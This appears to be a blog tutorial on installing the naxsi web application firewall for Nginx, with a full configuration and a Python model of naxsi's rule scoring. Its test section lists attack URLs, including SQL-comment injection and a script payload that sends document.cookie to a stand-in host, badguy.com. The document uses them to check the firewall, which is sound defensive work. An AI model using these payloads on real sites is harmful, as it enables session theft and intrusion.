Naxsi is an open-source, high-performance, low-rule-maintenance web application firewall module for Nginx, the well-known web server and reverse proxy. Its goal is to help people protect their web applications against cross-site scripting, SQL injection, cross-site request forgery, and local and remote file inclusion attacks.
2. Download Naxsi

cd /data0/software
wget https://github.com/nbs-system/naxsi/archive/master.zip
mv master.zip naxsi-master.zip
unzip naxsi-master.zip

master.zip is a snapshot of whatever the branch head happens to be at download time, so the build is not reproducible. For a production box, download a tagged release instead and record the archive's checksum alongside the build.
3. Recompile Nginx with the naxsi module

cd ngx_openresty-1.4.3.6
./configure --user=www --group=www --prefix=/usr/local/openresty --with-luajit \
    --with-http_stub_status_module --with-http_ssl_module --with-http_sub_module \
    --with-http_realip_module --add-module=/data0/naxsi/naxsi_src
gmake
gmake install
cd ../

--add-module must point at the naxsi_src directory of the archive unpacked in the previous step (the path above is the page's own; adjust it to where you unpacked). Note that with this prefix OpenResty installs nginx under /usr/local/openresty/nginx/; the conf and sbin paths used in the following steps are the page's own and have to match where your nginx actually lives.
4. Copy naxsi's core rule set

cp naxsi_config/naxsi_core.rules /usr/webserver/nginx/conf/

naxsi_core.rules only contains the MainRule signatures and their scores; on its own it blocks nothing. The per-site rules in the next step decide what the scores do.
Define the security rules for one virtual host

vi mysite.rules

Contents:

#LearningMode;   # enables learning mode: matches are logged, nothing is blocked
SecRulesEnabled;
#SecRulesDisabled;
DeniedUrl "/RequestDenied";

## check rules
CheckRule "$SQL >= 8" BLOCK;
CheckRule "$RFI >= 8" BLOCK;
CheckRule "$TRAVERSAL >= 4" BLOCK;
CheckRule "$EVADE >= 4" BLOCK;
CheckRule "$XSS >= 8" BLOCK;

Each MainRule that matches a request adds its score to one of the named counters; the request is blocked only when a counter reaches the threshold of its CheckRule, and blocked requests are internally redirected to DeniedUrl. Before switching blocking on for a real site, run with LearningMode uncommented for a while and review the log for false positives.
Edit nginx.conf

In the http section add:

include naxsi_core.rules;

and include mysite.rules in the location that is to be protected. The complete nginx.conf:
# Values marked (?) did not survive on the page (numbers and path separators
# were stripped) and are restored from the common nginx template this file
# follows; check them against your own installation.
user www www;
worker_processes 8;
error_log /data1/logs/nginx_error.log crit;
# (?)
pid /usr/webserver/nginx/nginx.pid;
#Specifies the value for maximum file descriptors that can be opened by this process.
worker_rlimit_nofile 65535;

events {
    use epoll;
    # (?)
    worker_connections 65535;
}

http {
    include mime.types;
    # naxsi MainRule signatures, copied here in step 4
    include naxsi_core.rules;
    default_type application/octet-stream;
    #charset gb2312;
    server_names_hash_bucket_size 128;
    client_header_buffer_size 32k;
    # (?)
    large_client_header_buffers 4 32k;
    client_max_body_size 8m;
    sendfile on;
    tcp_nopush on;
    keepalive_timeout 60;
    tcp_nodelay on;
    server_tokens off;

    fastcgi_connect_timeout 300;
    # (?) the next two values
    fastcgi_send_timeout 300;
    fastcgi_read_timeout 300;
    fastcgi_buffer_size 64k;
    # (?)
    fastcgi_buffers 4 64k;
    fastcgi_busy_buffers_size 128k;
    # (?)
    fastcgi_temp_file_write_size 128k;

    gzip on;
    gzip_min_length 1k;
    # (?)
    gzip_buffers 4 16k;
    gzip_http_version 1.0;
    gzip_comp_level 2;
    gzip_types text/plain application/x-javascript text/css application/xml;
    gzip_vary on;

    #limit_zone crawler $binary_remote_addr 10m;

    log_format access '$remote_addr - $remote_user [$time_local] "$request" '
                      '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
                      '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';
    # (?) the page's definition of wwwlogs was lost; the same fields as access are used here
    log_format wwwlogs '$remote_addr - $remote_user [$time_local] "$request" '
                       '$status $body_bytes_sent $upstream_response_time $request_time "$http_referer" '
                       '"$http_user_agent" $http_x_forwarded_for "$server_name" "$http_host"';

    # the site itself; the naxsi front end below proxies to it
    server {
        listen 80;
        server_name blog.abc.com;
        index index.html index.htm index.php;
        # (?)
        root /data0/htdocs/blog;
        #limit_conn crawler 20;

        location ~ .*\.(php|php5)?$ {
            #fastcgi_pass unix:/tmp/php-cgi.sock;
            fastcgi_pass 127.0.0.1:9000;
            fastcgi_index index.php;
            # (?)
            include fcgi.conf;
        }
        location ~ .*\.(gif|jpg|jpeg|png|bmp|swf)$ {
            expires 30d;
        }
        location ~ .*\.(js|css)?$ {
            expires 1h;
        }
        access_log /data1/logs/access.log access;
    }

    # naxsi front end: the site rules are active in this location only
    server {
        # (?)
        listen 80;
        server_name www.abc.com;

        location / {
            include /usr/webserver/nginx/conf/mysite.rules;
            proxy_pass http://127.0.0.1/;
            # (?) the Host value is garbled on the page; it must name the backend
            # server block, otherwise the request lands back in this block and loops
            proxy_set_header Host blog.abc.com;
        }
        # naxsi sends blocked requests here by internal redirect
        location /RequestDenied {
            return 403;
        }
        # (?) path
        access_log /data1/logs/www.log wwwlogs;
        error_log /data1/logs/mysite_nginx_error.log debug;
    }

    server {
        # (?) both values
        listen 80;
        server_name status.abc.com;
        stub_status on;
        access_log off;
    }
}
5. Start Nginx

/usr/webserver/nginx/sbin/nginx -t
killall -9 nginx
/usr/webserver/nginx/sbin/nginx

Check the configuration with -t first: naxsi parses its rules files at startup, so a typo in naxsi_core.rules or mysite.rules would otherwise leave you with no web server after the killall. (The sbin path is the page's conf directory's sibling; its prefix did not survive on the page.)
6. Test

http://www.abc.com/test.php?name=40/**/and/**/1=1   rejected: conditional SQL injection
http://www.abc.com/test.php?name=%28%29   rejected: special characters
http://www.abc.com/test.php?term=%3Cscript%3Ewindow.open%28%22http://badguy.com?cookie=%22+document.cookie%29%3C/script%3E   rejected: script injection in a parameter value
http://www.abc.com/test.php?title=Meta%20http-equiv=%22refresh%22%20content=%220;%22   rejected

The requests filtered by naxsi can be reviewed in /data1/logs/mysite_nginx_error.log. Each one is logged as a NAXSI_FMT line giving the client ip, server, uri and the id, zone and variable name of every rule that matched; those ids and variable names are what you need to write BasicRule whitelist entries for false positives. The debug level on that error_log is handy while tuning but far too verbose to leave on in production.
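To make it visible why each of the four test requests above is rejected, and how the CheckRule thresholds in mysite.rules turn individual rule scores into a block decision, here is an added example that models naxsi's scoring in Python. It is not part of the original post and not naxsi's own code: the MainRule set inside it is constructed for the example in naxsi's rule syntax with illustrative scores (not the ids and scores of the real naxsi_core.rules), the CheckRule lines are the ones from step 4, and the URLs are the page's own test URLs plus two constructed ones that should pass.

```python
"""Simulate naxsi's score-and-threshold model (added example, not naxsi code).
Every MainRule that matches a request variable adds its "s:" points to named
counters ($SQL, $XSS, ...); the CheckRule lines of mysite.rules decide the
request's fate once a counter reaches its threshold.  Simplifications: only the
URL and ARGS zones are modelled, a rule scores once per matched variable
(occurrence counting differs between naxsi versions), scores are illustrative."""
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed rules in naxsi's MainRule syntax (modelled on, not copied from, naxsi_core.rules).
CORE_RULES = r'''
MainRule "str:\"" "msg:double quote" "mz:ARGS|URL|BODY" "s:$SQL:8,$XSS:8" id:1001;
MainRule "str:/*" "msg:mysql comment (/*)" "mz:ARGS|URL|BODY" "s:$SQL:8" id:1003;
MainRule "str:*/" "msg:mysql comment (*/)" "mz:ARGS|URL|BODY" "s:$SQL:8" id:1004;
MainRule "str:;" "msg:semicolon" "mz:ARGS|URL|BODY" "s:$SQL:4,$XSS:8" id:1008;
MainRule "str:=" "msg:equal sign in var" "mz:ARGS|BODY" "s:$SQL:2" id:1009;
MainRule "str:(" "msg:open parenthesis" "mz:ARGS|URL|BODY" "s:$SQL:4,$XSS:8" id:1010;
MainRule "str:)" "msg:close parenthesis" "mz:ARGS|URL|BODY" "s:$SQL:4,$XSS:8" id:1011;
MainRule "str:/.." "msg:directory traversal" "mz:ARGS|URL|BODY" "s:$TRAVERSAL:4" id:1101;
MainRule "str:<" "msg:html open tag" "mz:ARGS|URL|BODY" "s:$XSS:8" id:1302;
MainRule "str:>" "msg:html close tag" "mz:ARGS|URL|BODY" "s:$XSS:8" id:1303;
'''
# The thresholds from the mysite.rules shown in step 4.
SITE_RULES = '''
CheckRule "$SQL >= 8" BLOCK;
CheckRule "$RFI >= 8" BLOCK;
CheckRule "$TRAVERSAL >= 4" BLOCK;
CheckRule "$EVADE >= 4" BLOCK;
CheckRule "$XSS >= 8" BLOCK;
'''
FIELD = re.compile(r'"((?:[^"\\]|\\.)*)"|(id:\d+)')
CHECK = re.compile(r'CheckRule\s+"(\$[A-Z]+)\s*(>=|<=|>|<)\s*(\d+)"\s+(BLOCK|DROP|ALLOW|LOG)\s*;')
OPS = {">=": lambda a, b: a >= b, "<=": lambda a, b: a <= b,
       ">": lambda a, b: a > b, "<": lambda a, b: a < b}


def parse_main_rules(text):
    """MainRule lines -> dicts with needle, zones, per-counter scores and id."""
    rules = []
    for line in text.splitlines():
        if not line.strip().startswith("MainRule"):
            continue
        rule = {"scores": {}}
        for quoted, bare in FIELD.findall(line):
            key, _, val = (bare or quoted.replace('\\"', '"')).partition(":")
            if key == "str":
                rule["needle"] = val.lower()      # str: matches are case-insensitive
            elif key == "mz":
                rule["zones"] = set(val.split("|"))
            elif key == "s":
                for counter, pts in (p.rsplit(":", 1) for p in val.split(",")):
                    rule["scores"][counter] = int(pts)
            elif key == "id":
                rule["id"] = int(val)
        rules.append(rule)
    return rules

def parse_check_rules(text):
    return [(c, op, int(t), act) for c, op, t, act in CHECK.findall(text)]

def request_vars(url):
    """The zones inspected for a GET: the path and the decoded query arguments."""
    parts = urlsplit(url)
    args = [(unquote_plus(n), unquote_plus(v))
            for n, _, v in (p.partition("=") for p in parts.query.split("&") if p)]
    return {"URL": [("url", parts.path)], "ARGS": args}

def evaluate(url, learning=False):
    """Return (decision, counters, matched rule ids) for a request URL."""
    main_rules, counters, hits = parse_main_rules(CORE_RULES), {}, []
    for zone, items in request_vars(url).items():
        for _name, value in items:
            for rule in main_rules:
                if zone in rule["zones"] and rule["needle"] in value.lower():
                    hits.append(rule["id"])
                    for counter, pts in rule["scores"].items():
                        counters[counter] = counters.get(counter, 0) + pts
    decision = "PASS"
    for counter, op, threshold, action in parse_check_rules(SITE_RULES):
        if action in ("BLOCK", "DROP") and OPS[op](counters.get(counter, 0), threshold):
            decision = "LOG" if learning else "BLOCK"   # LearningMode only logs
    return decision, counters, hits


# The four requests from the test section above, plus two constructed ones that
# should pass: a harmless value, and a lone "=" that scores $SQL=2, under the threshold.
TEST_URLS = [
    "http://www.abc.com/test.php?name=40/**/and/**/1=1",
    "http://www.abc.com/test.php?name=%28%29",
    "http://www.abc.com/test.php?term=%3Cscript%3Ewindow.open%28%22http://badguy.com"
    "?cookie=%22+document.cookie%29%3C/script%3E",
    "http://www.abc.com/test.php?title=Meta%20http-equiv=%22refresh%22%20content=%220;%22",
    "http://www.abc.com/test.php?name=hello%20world",
    "http://www.abc.com/test.php?q=a=b",
]

if __name__ == "__main__":
    for url in TEST_URLS:
        decision, counters, ids = evaluate(url)
        print(f"{decision:5} {counters} ids={ids} {url}")
```

Running it shows the first four URLs as BLOCK together with the counters that pushed them over a threshold (the SQL comment markers alone put the first request at $SQL=18, the two parentheses of the second reach $SQL=8 and $XSS=16), while the harmless value and the single "=" pass. Raising or lowering the CheckRule thresholds, or uncommenting LearningMode (the learning flag here), is the tuning you do on the real mysite.rules. Real naxsi also inspects headers, cookies and the request body, and its rule ids and scores are the ones in naxsi_core.rules, not these.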
Unless otherwise noted, the articles on this blog are original; when reposting, please credit this article with a link to it. Article URL: http://blog.cnwyhx.com/?p=301